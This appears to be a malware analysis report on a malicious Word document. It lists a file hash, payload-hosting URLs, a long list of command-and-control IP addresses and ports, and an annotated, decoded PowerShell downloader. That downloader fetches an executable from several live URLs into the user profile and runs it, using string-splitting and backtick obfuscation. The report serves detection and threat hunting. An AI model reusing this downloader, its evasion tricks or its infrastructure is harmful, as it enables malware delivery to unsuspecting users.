- Hashes of doc
- =============
- 15183c499484fa82ec8625bbee60f21590dfe1d8c8febd9eb6bf8392dd915593 SU-6624 Medical report p2.doc
- URLs found in doc
- =================
- hxxps://juice-dairy.com/wp-content/0axb/
- hxxp://yamamotovn.com/wp-admin/m3rW76/
- hxxp://huaweisolarinverter.com/eng/QQ/
- hxxp://ceciliatessierirabassi.com/ctr/IKh9/
- hxxps://tailgatecheap.com/wp-admin/kQXm/
- Config (via Triage)
- ====================
- https://tria.ge/reports/191107-z2nj9h9nb2/task1
- 165.227.156.155:443
- 104.239.175.211:8080
- 67.225.179.64:8080
- 192.241.220.155:8080
- 179.12.170.148:8080
- 5.196.74.210:8080
- 189.209.217.49:80
- 178.79.161.166:443
- 190.228.72.244:53
- 105.228.98.115:443
- 31.172.240.91:8080
- 136.243.177.26:8080
- 87.230.19.21:8080
- 171.101.153.86:990
- 37.157.194.134:443
- 209.141.41.136:8080
- 91.205.215.66:8080
- 167.99.105.223:7080
- 83.136.245.190:8080
- 167.71.10.37:8080
- 85.104.59.244:20
- 182.176.132.213:8090
- 104.236.246.93:8080
- 186.4.172.5:8080
- 62.75.187.192:8080
- 186.4.172.5:443
- 31.12.67.62:7080
- 192.81.213.192:8080
- 95.128.43.213:8080
- 211.63.71.72:8080
- 92.222.216.44:8080
- 212.129.24.79:8080
- 173.212.203.26:8080
- 47.41.213.2:22
- 86.22.221.170:80
- 94.177.216.217:8080
- 173.249.47.77:8080
- 176.31.200.130:8080
- 181.143.194.138:443
- 178.210.51.222:8080
- 78.24.219.147:8080
- 46.105.131.87:80
- 45.33.49.124:443
- 169.239.182.217:8080
- 200.71.148.138:8080
- 186.75.241.230:80
- 217.160.182.191:8080
- 181.31.213.158:8080
- 87.106.136.232:8080
- 206.189.98.125:8080
- 104.131.11.150:8080
- 37.187.2.199:443
- 103.39.131.88:80
- 115.78.95.230:443
- 190.211.207.11:443
- 138.201.140.110:8080
- 104.131.44.150:8080
- 190.145.67.134:8090
- 186.4.172.5:20
- 181.57.193.14:80
- 80.11.163.139:21
- 190.53.135.159:21
- 200.51.94.251:80
- 183.102.238.69:465
- 212.71.234.16:8080
- 87.106.139.101:8080
- 94.205.247.10:80
- 190.226.44.20:21
- 190.51.63.1:80
- 59.103.164.174:80
- 149.202.153.252:8080
- 152.89.236.214:8080
- 144.139.247.220:80
- 159.65.25.128:8080
- Base64 code --> decoded
- ========================
- Triple encoded with 'owns'
- --------------------------
- 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
- -----
- # Analyst notes on the decoded PowerShell downloader stage.
- # Every $Xxx='Yyy' assignment whose variable is never read again in this
- # snippet is obfuscator padding; only $Eovekhgwr, $Klpiulah, $Rbfsudzu,
- # $Wemdoddzvurgl and $Louhmrtd carry the actual logic.
- $Qepiofmffd='Cdrnrairzlsy'
- # '909' becomes the base name of the dropped file (see $Klpiulah below).
- $Eovekhgwr = '909'
- $Wekwmiruhaz='Nbuedutbt'
- # Drop path: %USERPROFILE%\909.exe. An .exe written directly into the
- # user-profile root is the host-side artifact to hunt for.
- $Klpiulah=$env:userprofile+'\'+$Eovekhgwr+'.exe'
- $Witkelrlvqq='Hoklijnrvcey'
- # Cmdlet name assembled from string fragments and invoked through the call
- # operator '.', presumably to avoid a literal "New-Object" in the script;
- # the result is a System.Net.WebClient instance.
- $Rbfsudzu=.('new-'+'ob'+'ject') NeT.webCLient
- # The five payload URLs (the same hosts as the "URLs found in doc" list
- # above) are stored '*'-joined and split at runtime. The backtick escapes
- # inside the method name ("Sp`liT") are a further static-signature evasion.
- $Wemdoddzvurgl='https://juice-dairy.com/wp-content/0axb/*http://yamamotovn.com/wp-admin/m3rW76/*http://huaweisolarinverter.com/eng/QQ/*http://ceciliatessierirabassi.com/ctr/IKh9/*https://tailgatecheap.com/wp-admin/kQXm/'."Sp`liT"('*')
- $Ucznckvadpg='Jojqwaaxpkis'
- # Try each URL in turn; DownloadFile (again backtick-obfuscated) writes the
- # HTTP response body to $Klpiulah.
- foreach($Louhmrtd in $Wemdoddzvurgl){try{$Rbfsudzu."dowNlo`AD`F`Ile"($Louhmrtd, $Klpiulah)
- $Xagomoxwi='Oqzgkues'
- # Size gate: the file is launched only if it is at least 30904 bytes,
- # presumably to skip error pages or truncated/sinkholed responses.
- # Process.Start of %USERPROFILE%\909.exe from the PowerShell host is the
- # process-creation event to alert on.
- If ((.('G'+'et-I'+'tem') $Klpiulah)."Len`G`TH" -ge 30904) {[Diagnostics.Process]::"S`TArt"($Klpiulah)
- $Llhxqqfs='Sdxzxatbxmgn'
- # First successful download-and-launch ends the loop.
- break
- # Empty catch: any failure (DNS, HTTP error, AV block) is swallowed and the
- # next URL is tried, so a partial outage of the hosting sites is tolerated.
- $Kaqepdavc='Uhpyhrpfhvm'}}catch{}}$Ntlrqrwyx='Pzacnuwbcjc'